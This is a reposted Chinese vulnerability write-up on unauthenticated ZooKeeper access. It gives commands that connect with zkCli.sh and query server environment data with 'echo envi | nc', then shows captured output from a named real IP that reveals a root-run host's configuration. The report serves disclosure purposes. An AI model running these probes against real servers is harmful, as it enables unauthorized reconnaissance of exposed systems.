• ZooKeeper未授权漏洞


    ZooKeeper是一个分布式的,开放源码的分布式应用程序协调服务,是Google的Chubby一个开源的实现,它是集群的管理者,监视着集群中各个节点的状态根据节点提交的反馈进行下一步合理操作。最终,将简单易用的接口和性能高效、功能稳定的系统提供给用户,默认端口2181。

    利用:

    连接:

    ./zkCli.sh -server ip:port
    

      

    获取系统环境

    echo envi|nc ip port
    

    乌云网易案例:

    x1.png







    oot@kali:~# echo envi |nc 60.191.83.13 2181

    Environment:

    zookeeper.version=3.4.6-1569965, built on 02/20/2014 09:09 GMT

    host.name=localhost

    java.version=1.7.0_79

    java.vendor=Oracle Corporation

    java.home=/opt/jdk1.7.0_79/jre

    java.class.path=/root/zookeeper-3.4.6/bin/../build/classes:/root/zookeeper-3.4.6/bin/../build/lib/*.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-log4j12-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/slf4j-api-1.6.1.jar:/root/zookeeper-3.4.6/bin/../lib/netty-3.7.0.Final.jar:/root/zookeeper-3.4.6/bin/../lib/log4j-1.2.16.jar:/root/zookeeper-3.4.6/bin/../lib/jline-0.9.94.jar:/root/zookeeper-3.4.6/bin/../zookeeper-3.4.6.jar:/root/zookeeper-3.4.6/bin/../src/java/lib/*.jar:/root/zookeeper-3.4.6/bin/../conf:

    java.library.path=/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib

    java.io.tmpdir=/tmp

    java.compiler=<NA>

    os.name=Linux

    os.arch=amd64

    os.version=3.2.0-4-amd64

    user.name=root

    user.home=/root

    user.dir=/root/zookeeper-3.4.6/bin



    x2.png



    漏洞证明:

     

    修复方案:

     

    版权声明:转载请注明来源 路人甲@乌云


    漏洞回应

    厂商回应:

    危害等级:低

    漏洞Rank:3

    确认时间:2016-04-11 10:21

    厂商回复:

    漏洞已修复,感谢您对网易的关注!

    最新状态:

    暂无

  • 相关阅读:
    export ,export default 和 import 区别 以及用法
    koa2 安装环境
    Webstorm在MAC下的安装方法
    Mac 下搭建vue开发环境
    Mac系统下安装Vue-cli详细步骤
    npm 安装vue 报错Failed at the chromedriver@2.34.0 install script 'node install.js'
    #001 WebStrom SVN使用技巧
    #006 dependencies和devDependencies的区别
    #001 GIT创建分支
    #003 React 组件 继承 自定义的组件
  • 原文地址:https://www.cnblogs.com/junsec/p/11763476.html
Copyright © 2020-2023  润新知